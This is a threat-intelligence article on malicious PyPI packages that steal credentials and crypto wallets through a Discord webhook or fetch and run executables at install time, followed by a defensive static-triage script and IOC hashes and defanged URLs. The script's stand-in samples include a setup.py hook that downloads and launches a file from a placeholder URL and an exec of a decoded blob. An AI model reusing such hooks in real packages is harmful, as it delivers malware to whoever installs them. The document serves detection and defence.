Python Package Index (PyPI) packages have become a common way for threat actors to post malware that unsuspecting victims may download. The FortiGuard Labs team has been monitoring this attack vector for some time and, earlier this year, began posting a monthly update of the zero-day attacks we have discovered. Recently, FortiGuard introduced a new AI engine to our OSS supply chain attack hunting system. Researchers have discovered several new zero-day PyPI attacks using this AI engine assistant. A little preview of our AI engine detection is shown below.[1]
Figure 1: AI engine detection
The FortiGuard report looks at two sets of zero-day attacks in PyPI packages published in early July. The report groups the packages by author to show how common it is for one author to release several similar or even byte-identical malicious packages under different PyPI account IDs. The packages in the first set were uploaded by a threat actor using the handle Josef M and the email address “johannes.mayer@yahoo.com.” The second set was uploaded by an author with the PyPI ID “killskids.”
The First Set of Packages
- pycolouringsextV1 (version 1.1.0)
- sysfontstoolV1 (version 1.1.0)
- syscoloringsaddition (version 1.1.0)
- pitutil (version 1.0.0)
- syssqlitedbmodules (version 1.1.0)
These packages all had a similar project page style, as shown below:
Figure 2: Project description of the first set of packages
Now look at one of the packages, “syssqlitedbmodules.” The first thing we notice in its __init__.py is a long encrypted string that the module decrypts and executes as soon as it is imported.
Figure 3: __init__.py of syssqlitedbmodules
After decryption, the code turns out to be an information stealer similar to the one we analyzed in a previous blog.
It collects credit card data, cryptocurrency wallets, account logins and similar data and exfiltrates it through a Discord webhook.
Figure 4: Decrypted code snippet of __init__.py
The Second Set of Packages
- killskids-auth (versions 1.0.5, 2.0.0)
- testpackageforyoutube (version 1.0.0)
The setup.py in these packages uses cmdclass to override setuptools commands, so the attacker's code runs during installation (as soon as pip builds the package), as shown below.
Figure 5: setup.py of one of the second set of packages
The overridden command connects to a URL, downloads an executable file and runs it. The payload hosted at that URL was no longer available at the time of writing, so its behavior could not be confirmed.
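As an added example (not code from the FortiGuard report or from the packages it describes), the following Python script performs the two static checks a reviewer would run over a downloaded sdist before installing it: it parses setup.py for cmdclass overrides of install-time commands whose classes reach the network or spawn a process, and parses __init__.py for exec/eval of decoded data and for embedded Discord webhook URLs. Both inputs are constructed stand-ins that mimic the first and second sets above; the URL, the blob and the webhook path in them are placeholders, not the IOCs listed later on this page.

```python
"""Static triage of a PyPI sdist for the two behaviours described above:
an install-time cmdclass hook in setup.py that fetches and runs a payload,
and an import-time blob in __init__.py that is decoded and exec'd.
Added example; the two inputs below are constructed stand-ins, not the
contents of the packages in the report."""
import ast
import re

# Constructed stand-in for a setup.py with a cmdclass hook (URL is a placeholder).
SAMPLE_SETUP_PY = '''
import os, subprocess, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        url = "https://example.invalid/payload.exe"   # placeholder, not a real IOC
        path = os.path.join(os.environ.get("TEMP", "/tmp"), "payload.exe")
        urllib.request.urlretrieve(url, path)
        subprocess.Popen([path])

setup(name="demo-pkg", version="1.0.0", cmdclass={"install": PostInstall})
'''

# Constructed stand-in for an __init__.py that decodes and executes a blob.
# The blob is never decoded here; the analyzer is purely static.
SAMPLE_INIT_PY = '''
import base64, zlib
_hook = "https://discord.com/api/webhooks/000/placeholder"   # placeholder
_blob = "eJxLzs8tKMrMS1UoSS0uUQQAGo8E0g=="                  # placeholder
exec(zlib.decompress(base64.b64decode(_blob)))
'''

# setuptools commands that run during `pip install` or sdist metadata builds
INSTALL_TIME_COMMANDS = {"install", "develop", "egg_info", "build_py", "bdist_egg"}
NETWORK_PREFIXES = ("urllib.", "requests.", "http.client.", "socket.")
PROCESS_PREFIXES = ("subprocess.", "os.system", "os.popen", "os.startfile", "os.exec")
DECODE_NAMES = {"b64decode", "decompress", "unhexlify", "decrypt", "fromhex"}
WEBHOOK_RE = re.compile(r"https?://[\w.-]*discord(?:app)?\.com/api/webhooks/", re.I)


def _dotted(func) -> str:
    """Return 'mod.sub.name' for a call target, '' if it is not a plain name chain."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def _calls_in(node):
    """Dotted names of every call made anywhere inside `node`."""
    return [_dotted(n.func) for n in ast.walk(node) if isinstance(n, ast.Call)]


def triage_setup_py(src: str) -> list:
    """Findings for setup.py: which commands cmdclass overrides and what those classes call."""
    tree = ast.parse(src)
    classes = {n.name: n for n in ast.walk(tree) if isinstance(n, ast.ClassDef)}
    findings = []
    for node in ast.walk(tree):
        # match the cmdclass={...} keyword argument passed to setup()
        if not (isinstance(node, ast.keyword) and node.arg == "cmdclass"
                and isinstance(node.value, ast.Dict)):
            continue
        for key, val in zip(node.value.keys, node.value.values):
            if not (isinstance(key, ast.Constant) and isinstance(val, ast.Name)):
                continue
            cmd, cls = key.value, val.id
            if cmd not in INSTALL_TIME_COMMANDS:
                continue
            findings.append(f"cmdclass overrides '{cmd}' with {cls}")
            calls = _calls_in(classes[cls]) if cls in classes else []
            if any(c.startswith(NETWORK_PREFIXES) for c in calls):
                findings.append(f"{cls} reaches the network during '{cmd}'")
            if any(c.startswith(PROCESS_PREFIXES) for c in calls):
                findings.append(f"{cls} spawns a process during '{cmd}'")
    return findings


def triage_init_py(src: str) -> list:
    """Findings for __init__.py: exec/eval of decoded data and embedded webhook URLs."""
    tree = ast.parse(src)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _dotted(node.func) in ("exec", "eval"):
            inner = {c.rsplit(".", 1)[-1] for c in _calls_in(node)}
            if inner & DECODE_NAMES:
                findings.append("exec/eval of decoded data at import time")
            else:
                findings.append("exec/eval at import time")
    if WEBHOOK_RE.search(src):
        findings.append("Discord webhook URL embedded")
    return findings


if __name__ == "__main__":
    for name, result in (("setup.py", triage_setup_py(SAMPLE_SETUP_PY)),
                         ("__init__.py", triage_init_py(SAMPLE_INIT_PY))):
        print(name, "->", result or ["no findings"])
```

Run the functions over files extracted from the sdist archive itself, not over a package obtained through pip: pip builds metadata from an sdist before it has finished resolving, which already executes setup.py. Installing wheels only (pip install --only-binary=:all:) sidesteps the setup.py hook but not the __init__.py one, which fires on first import regardless of how the package was installed.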
Conclusion: This blog shows that the same author often uses different PyPI IDs when posting malicious packages, most likely to spread the malware as widely as possible before it is taken down. Reusing the same code across packages (the hash list below contains two pairs of byte-identical __init__.py files) lets malware authors publish new packages quickly and extend the campaign's shelf life.
Discovering new OSS supply chain attacks hidden in millions of packages is like looking for a needle in a haystack. Our new AI engine can detect these new attacks far better than traditional approaches, discovering threats in near real-time to protect organizations from malicious threat actors lying in wait.
IOCs (MD5 of the malicious file in each package):
- pycolouringsextV1-1.1.0 __init__.py: 475e15da18cd785eb079981585a6519b
- sysfontstoolV1-1.1.0 __init__.py: 475e15da18cd785eb079981585a6519b
- syscoloringsaddition-1.1.0 __init__.py: 188a8e8f9afb0423276cbe92f8846c47
- pitutil-1.0.0 __init__.py: f658a9d876041b6434d073d883c72865
- syssqlitedbmodules-1.1.0 __init__.py: 188a8e8f9afb0423276cbe92f8846c47
- killskids-auth-1.0.5 setup.py: d643d5f2e8631bcb831e3e79d198a061
- killskids-auth-2.0.0 setup.py: 9286d9ad57a21c49a06dac2fb7f463ba
- testpackageforyoutube-1.0.0 setup.py: 9c8cbdc00c745407198863372d5ca06c
Malicious URLs:
- hxxps://github[.]com/killskids/test/raw/main/calc[.]exe
- hxxps://github[.]com/killskids/test/raw/main/auth-server[.]exe
- hxxps://file[.]io/IWbO1KYBw4Bn
This article is presented at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Reporting: https://www.redskyalliance.org/
Website: https://www.redskyalliance.com/
LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5993554863383553632
[1] https://www.fortinet.com/blog/threat-research/continued-oss-supply-chain-attacks-hidden-in-pypi?lctg=141970831